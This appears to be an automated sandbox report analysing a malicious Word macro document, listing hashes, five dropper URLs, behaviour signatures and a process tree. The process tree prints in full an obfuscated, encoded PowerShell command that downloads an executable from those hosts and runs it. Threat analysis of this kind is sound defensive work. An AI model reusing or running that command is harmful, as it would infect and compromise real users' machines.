Analysis
-
max time kernel
166s -
max time network
174s -
platform
windows10-2004_x64 -
resource
win10v2004-20220414-en -
submitted
21-05-2022 00:20
General
-
Target
854781967e533657f40f135d875efcd77472b02c5e6c61d8e2c6040ae900969c.doc
-
Size
202KB
-
MD5
b74a9cd66c7e2f98d70acdfcdd2446f3
-
SHA1
d71a8d331daddd3ed6a133bcc31fa44639952838
-
SHA256
854781967e533657f40f135d875efcd77472b02c5e6c61d8e2c6040ae900969c
-
SHA512
3aa00644e7af98c54d9434496ce299890a759ac2a94bee7fdbf48d5a09837e4a4b275d7299af0ba22ebb3c50e111c734c39270e62365e4be2c38bd3bb0156c0e
Score
10/10
Malware Config
Extracted
Language
ps1
Deobfuscated
URLs
exe.dropper
http://campchof.org/njy3/BO6P9K3AwX/
exe.dropper
https://mydreft.com/speed/pn1up/
exe.dropper
https://papelarpoa.com.br/coupons/ejli/
exe.dropper
https://funny-case.pl/wp-admin/5f3f/
exe.dropper
https://test.espace-yoga.fr/jodp17ksjfs/mm2/
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
-
Blocklisted process makes network request 4 IoCs
-
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Enumerates system info in registry 2 TTPs 3 IoCs
-
Suspicious behavior: AddClipboardFormatListener 2 IoCs
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
-
Suspicious use of AdjustPrivilegeToken 1 IoCs
-
Suspicious use of FindShellTrayWindow 2 IoCs
-
Suspicious use of SetWindowsHookEx 8 IoCs
-
Suspicious use of WriteProcessMemory 2 IoCs
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\854781967e533657f40f135d875efcd77472b02c5e6c61d8e2c6040ae900969c.doc" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122882⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -w hidden -en JABOAHUAYQBsAHQAcABxAHEAcABuAGkAagA9ACcATQBkAGoAYQByAG4AdABhAHcAYgAnADsAJABMAHIAcwByAGQAcgBqAHEAcwBtAGkAIAA9ACAAJwAzADIAOAAnADsAJABQAHIAdgBiAHMAdwBvAG0AdwBzAHIAcgBvAD0AJwBWAGQAawBoAGMAZgB3AG0AagBsAHEAcQBhACcAOwAkAEEAaQB6AHEAdABjAGsAZAA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQATAByAHMAcgBkAHIAagBxAHMAbQBpACsAJwAuAGUAeABlACcAOwAkAFoAYwByAHQAYgB5AHUAbQBwAG4AbQB6AHEAPQAnAEkAZABpAHUAZgBzAHEAYQB5AHEAcwBlACcAOwAkAFkAZABtAGMAegBoAHUAawB5AD0AJgAoACcAbgBlAHcAJwArACcALQBvAGIAJwArACcAagBlAGMAdAAnACkAIABOAGUAdAAuAHcAZQBCAGMAbABJAGUATgBUADsAJABZAGQAYgBqAGsAagBtAGQAeABsAGwAPQAnAGgAdAB0AHAAOgAvAC8AYwBhAG0AcABjAGgAbwBmAC4AbwByAGcALwBuAGoAeQAzAC8AQgBPADYAUAA5AEsAMwBBAHcAWAAvACoAaAB0AHQAcABzADoALwAvAG0AeQBkAHIAZQBmAHQALgBjAG8AbQAvAHMAcABlAGUAZAAvAHAAbgAxAHUAcAAvACoAaAB0AHQAcABzADoALwAvAHAAYQBwAGUAbABhAHIAcABvAGEALgBjAG8AbQAuAGIAcgAvAGMAbwB1AHAAbwBuAHMALwBlAGoAbABpAC8AKgBoAHQAdABwAHMAOgAvAC8AZgB1AG4AbgB5AC0AYwBhAHMAZQAuAHAAbAAvAHcAcAAtAGEAZABtAGkAbgAvADUAZgAzAGYALwAqAGgAdAB0AHAAcwA6AC8ALwB0AGUAcwB0AC4AZQBzAHAAYQBjAGUALQB5AG8AZwBhAC4AZgByAC8AagBvAGQAcAAxADcAawBzAGoAZgBzAC8AbQBtADIALwAnAC4AIgBzAGAAUABsAEkAdAAiACgAJwAqACcAKQA7ACQAQwBnAG8AegB5AHQAbwBhAHUAYwBhAD0AJwBVAHUAcABmAGYAYgByAGMAbQBoAGYAJwA7AGYAbwByAGUAYQBjAGgAKAAkAEoAbQBuAHQAegBmAG4AeQBoAG8AIABpAG4AIAAkAFkAZABiAGoAawBqAG0AZAB4AGwAbAApAHsAdAByAHkAewAkAFkAZABtAGMAegBoAHUAawB5AC4AIgBEAGAATwB3AG4AYABMAG8AYQBgAGQARgBpAGwARQAiACgAJABKAG0AbgB0AHoAZgBuAHkAaABvACwAIAAkAEEAaQB6AHEAdABjAGsAZAApADsAJABJAGIAdABjAGkAdQBpAHcAbQA9ACcAQQBzAHMAZQBpAGkAZgB0AGQAYwB2AGcAaQAnADsASQBmACAAKAAoAC4AKAAnAEcAZQAnACsAJwB0AC0ASQB0ACcAKwAnAGUAbQAnACkAIAAkAEEAaQB6AHEAdABjAGsAZAApAC4AIgBMAGUAbgBnAGAAVABIACIAIAAtAGcAZQAgADIAOAA0ADUANQApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBTAGAAVABhAHIAVAAiACgAJABBAGkAegBxAHQAYwBrAGQAKQA7ACQAVQBuAHEAeQBpAHIAcwBrAD0AJwBTAHQAZwBzAHQAaQBuAHIAZgAnADsAYgByAGUAYQBrADsAJABOAHQAZABiAG0AZQBkAG0AdgBrAD0AJwBSAG8AagB3AGkAcABpAGEAaAByAGIAcQBsACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEkAbgB0AHIAZgBhAHQAaAB0AG4APQAnAE4AcAB4AHIAdwBhAHkAbwBlAGoAbQBlAGIAJwA=1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/2900-136-0x00007FFB80C60000-0x00007FFB80C70000-memory.dmpFilesize
64KB
-
memory/2900-138-0x000001E96EFB0000-0x000001E96EFB4000-memory.dmpFilesize
16KB
-
memory/2900-132-0x00007FFB82E50000-0x00007FFB82E60000-memory.dmpFilesize
64KB
-
memory/2900-133-0x00007FFB82E50000-0x00007FFB82E60000-memory.dmpFilesize
64KB
-
memory/2900-134-0x00007FFB82E50000-0x00007FFB82E60000-memory.dmpFilesize
64KB
-
memory/2900-135-0x00007FFB80C60000-0x00007FFB80C70000-memory.dmpFilesize
64KB
-
memory/2900-131-0x00007FFB82E50000-0x00007FFB82E60000-memory.dmpFilesize
64KB
-
memory/2900-145-0x00007FFB82E50000-0x00007FFB82E60000-memory.dmpFilesize
64KB
-
memory/2900-130-0x00007FFB82E50000-0x00007FFB82E60000-memory.dmpFilesize
64KB
-
memory/2900-144-0x00007FFB82E50000-0x00007FFB82E60000-memory.dmpFilesize
64KB
-
memory/2900-143-0x00007FFB82E50000-0x00007FFB82E60000-memory.dmpFilesize
64KB
-
memory/2900-142-0x00007FFB82E50000-0x00007FFB82E60000-memory.dmpFilesize
64KB
-
memory/4344-137-0x0000000000000000-mapping.dmp
-
memory/4936-140-0x00007FFB97790000-0x00007FFB98251000-memory.dmpFilesize
10.8MB
-
memory/4936-139-0x000001D6ECDC0000-0x000001D6ECDE2000-memory.dmpFilesize
136KB